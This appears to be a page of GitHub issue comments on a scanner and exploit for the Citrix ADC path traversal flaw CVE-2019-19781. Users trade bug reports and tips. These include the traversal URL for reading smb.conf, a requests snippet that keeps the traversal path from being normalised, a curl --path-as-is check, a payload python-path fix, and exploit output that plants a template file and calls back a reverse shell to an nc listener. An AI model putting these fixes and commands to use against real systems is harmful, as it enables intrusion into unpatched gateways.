trustedsec / cve-2019-19781 Goto Github PK

There is no cipher result check when a system fails TLS/SSL negotiation, for example. It creates a false positive as python gets an error and your check shows "did not respond" . We were comparing the results of this with some other scanning tools and noticed the difference. Real error like TLSv1 shows "bad handshake ... unsupported protocol". I am not into python so I don't know if there is an option to force renegotiation/downgrade or if the error response should include "server responded with invalid ssl".

The current version of urllib3 normalizes the request path when using the python requests module like this:

requests.get('http://server/vpn/../vpns/newbm.pl')

This will result in the request getting normalised to:

GET /vpns/newbm.pl

The impact is that if you are running the latest urllib3/python3 then the exploit will fail on Virtual IP interfaces but not on management interfaces (since traversal is not required there).

The scanner check won't lead to false negatives, because although the path is normalized, it will still hit the /vpns/ path which is blocked in the mitigation.

The fix is to use PreparedRequests and swap the URL out after normalization:

s = requests.Session()
url = "http://%s:%s/vpn/../vpns/cfg/smb.conf" % (target,targetport)
r = requests.Request(method='GET', url=url)
prep = r.prepare()
prep.url = url

For Citrix ADC VPX Release 13.0 python is not in the $PATH which makes payload execution failing.

$ env
HOME=/
FLEXLM_ANYHOSTNAME=1
PATH=/sbin:/bin:/usr/sbin:/usr/bin:/netscaler
PWD=/
$ python
python: not found

It is required to change payload to use python from /var/python/bin/python.

The scanner produces too many false positives. The scanner does not even check the server's response code returned. It just checks some patterns in server's response contents.

Hi,

Thanks for the hard work in getting this done... Unfortunately I'm getting a Traceback as below on both MacOS Catalina and Ubuntu 18.04 using python3. I've tried an IP and a URL - Any other suggestions?

Traceback (most recent call last):
File "cve-2019-19781_scanner.py", line 75, in
check_server(args.target, args.targetport)
File "cve-2019-19781_scanner.py", line 23, in check_server
if ("global") in req.content: # each smb.conf will contain a [global] variable
TypeError: a bytes-like object is required, not 'str'

Thanks!

Scanner gives false negative results, but manually curling gives the smb.

root@debian-recon:~/cve-2019-19781# python cve-2019-19781_scanner.py 67.109.188.129 443

Traceback (most recent call last):
  File "cve-2019-19781_scanner.py", line 79, in <module>
    else: check_server(args.target, args.targetport)
  File "cve-2019-19781_scanner.py", line 24, in check_server
    req = requests.get("https://%s:%s/vpn/../vpns/cfg/smb.conf" % (target,targetport), verify=False, timeout=2)
  File "/usr/lib/python2.7/dist-packages/requests/api.py", line 75, in get
    return request('get', url, params=params, **kwargs)
  File "/usr/lib/python2.7/dist-packages/requests/api.py", line 60, in request
    return session.request(method=method, url=url, **kwargs)
  File "/usr/lib/python2.7/dist-packages/requests/sessions.py", line 533, in request
    resp = self.send(prep, **send_kwargs)
  File "/usr/lib/python2.7/dist-packages/requests/sessions.py", line 646, in send
    r = adapter.send(request, **kwargs)
  File "/usr/lib/python2.7/dist-packages/requests/adapters.py", line 529, in send
    raise ReadTimeout(e, request=request)
requests.exceptions.ReadTimeout: HTTPSConnectionPool(host='67.109.188.129', port=443): Read timed out. (read timeout=2)

Hi,

Thanks for your research on this.

After running exploit it fires and I can confirm that the .xml artefact (tnnwzvreuu.xml) is created on the disk but the shell does not connect (listener created with nc -vlk 443)

[*] Saving filename as tnnwzvreuu.xml on the victim machine...
[*] Sleeping for 2 seconds to ensure file is written before we call it...
[*] Triggering GET request for the newly created file with a listener waiting...
[*] Shell should now be in your listener... enjoy. Keep this window open..
[!] Be sure to cleanup the two locations here (artifacts): /var/tmp/netscaler/portal/templates/, /netscaler/portal/templates/

Script output says 'Keep this window open' yet it bombs straight back out of the command and is not in a 'waiting' state.

Can confirm system is vulnerable as command below returns the smb.conf file:
curl -vk --path-as-is https://obfuscatedtargetip/vpn/../vpns/cfg/smb.conf

And:
curl -vk --path-as-is https://obfuscatedtargetip/vpn/../vpns/

Returns:

> Accept: */*
> 
< HTTP/1.1 403 Forbidden
< Date: Sat, 11 Jan 2020 14:01:13 GMT
< Server: Apache
< Content-Length: 207
< Content-Type: text/html; charset=iso-8859-1
< 
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /vpns/
on this server.</p>
</body></html>

Have confirmed outbound traffic is allowed to destination nc listener on 443.

Any assistance

The result of cve-2019-19781_scanner.py is still vulnerable but citrixmash.py is not successful.I tried many